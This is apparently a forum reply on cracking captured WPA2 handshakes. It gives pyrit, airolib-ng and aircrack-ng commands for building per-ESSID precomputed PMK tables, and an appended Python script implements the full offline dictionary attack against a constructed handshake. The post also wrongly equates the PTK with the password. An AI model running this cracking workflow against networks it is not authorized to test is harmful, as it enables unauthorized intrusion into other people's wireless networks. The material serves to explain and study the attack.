Hmm hmm. Double-check to ensure you have a complete 4-way handshake. You mentioned using pyrit, so run this and tell us what you see.
Code:
pyrit -r <.cap file> analyze
As for your crack speeds, yes, aircrack-ng is faster than pyrit (and cowpatty) running simple cracks. If you want to get some serious speed running your dictionaries (800k+/s) you need to create your own rainbow table with precomputed pairwise master keys (PMKs). Before I confuse you, let me explain:
When you run aircrack-ng you will notice the output is broken into 3 parts; the first two are the main parts to focus on. The "Master Key" is the pairwise master key. It is derived from the ESSID using the PBKDF2 algorithm. Basically, it takes a long-ass time to compute. This is the very reason it takes so long to crack WPA(2) encryption.
The basic process:
Word from dictionary + encryption algorithm > PMK > Private Transient Key (PTK, aka: the password) > plain text password
This has to be done for every single entry in your dictionary. Now, back to what I mentioned before. The PMKs are always the same, so why waste the time computing them for every single entry if you don't have to? There is one downside to this method that you should know. Precomputing a PMK from your dictionaries and saving them to a table is a VERY slow process. However, once it is done, it is done. That said, this rainbow table will only work on handshakes that were captured with the same ESSID that you used. To the blackhats out there, this will waste your time.
Code:
# echo <ESSID> > targetessid.txt
# airolib-ng <database name> --import essid targetessid.txt
# airolib-ng <database name> --import passwd <wordlist>
# airolib-ng <database name> --batch
# airolib-ng <database name> --stats (ensure 100%)
# aircrack-ng -r <database name> <.cap>
But I got sidetracked. Tell us if you have a genuine 4-way first.
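Editor's added example (not part of the post above, and not aircrack-ng or pyrit code): the word -> PMK -> PTK -> MIC chain the post outlines, with the PBKDF2 step pulled out into a precomputed per-ESSID table the way airolib-ng's --batch does it. The ESSID, passphrase, wordlist, MAC addresses, nonces and the EAPOL frame skeleton are all constructed for the demo; the one real value is the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE") used as a known-answer check on the PMK derivation. The last function also shows the caveat from the post: a table built for one ESSID finds nothing against a handshake from another.

```python
import hashlib
import hmac

# WPA2-PSK (CCMP) derivation chain, as used by aircrack-ng, pyrit and cowpatty:
#   passphrase + ESSID  --PBKDF2-HMAC-SHA1, 4096 rounds-->  PMK (32 bytes)   <- the slow step
#   PMK + MACs + nonces --PRF-384-->                         PTK, whose first 16 bytes are the KCK
#   KCK + EAPOL-Key frame (message 2, MIC field zeroed) --HMAC-SHA1[:16]--> MIC
# A cracker compares the computed MIC with the one in the captured handshake.


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC is HMAC-SHA1 over the frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_pmk_table(wordlist, essid: str) -> dict:
    """The airolib-ng --batch step: pay the PBKDF2 cost once per (word, ESSID) pair."""
    return {word: derive_pmk(word, essid) for word in wordlist}


def crack_with_table(table: dict, ap_mac, sta_mac, anonce, snonce, frame, captured_mic):
    """Per candidate only the cheap PRF and one HMAC remain; PBKDF2 was done when the table was built."""
    for word, pmk in table.items():
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return word
    return None


# --- Constructed handshake material (assumed values, not from a real capture) ---
ESSID = "CoffeeShopWiFi"          # assumed target network name
TRUE_PASSPHRASE = "sunshine99"    # assumed PSK; it is in the wordlist below
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# 99-byte EAPOL-Key message 2 skeleton: header, key info, replay counter, SNonce,
# zeroed IV/RSC/ID, zeroed 16-byte MIC field, zero key-data length.
EAPOL_FRAME = (bytes.fromhex("0103005f02010a0010") + (1).to_bytes(8, "big") + SNONCE
               + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))
WORDLIST = ["password", "letmein", "sunshine99", "qwerty123"]


def forge_captured_mic(passphrase: str, essid: str) -> bytes:
    """Stand in for the real client: the MIC a capture would contain for this PSK and ESSID."""
    kck = derive_ptk(derive_pmk(passphrase, essid), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, EAPOL_FRAME)


CAPTURED_MIC = forge_captured_mic(TRUE_PASSPHRASE, ESSID)


def run_demo() -> dict:
    """Table built for the right ESSID cracks the handshake; a table for another ESSID does not."""
    right_table = build_pmk_table(WORDLIST, ESSID)
    wrong_table = build_pmk_table(WORDLIST, "SomeOtherESSID")
    return {
        "known_answer_ok": derive_pmk("password", "IEEE").hex()
        == "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
        "found_with_right_essid": crack_with_table(
            right_table, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_FRAME, CAPTURED_MIC),
        "found_with_wrong_essid": crack_with_table(
            wrong_table, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_FRAME, CAPTURED_MIC),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

The table is keyed on the word only because the ESSID is fixed when it is built, which is exactly why airolib-ng asks you to import the ESSID before running --batch and why the same table is useless against a capture from a differently named network.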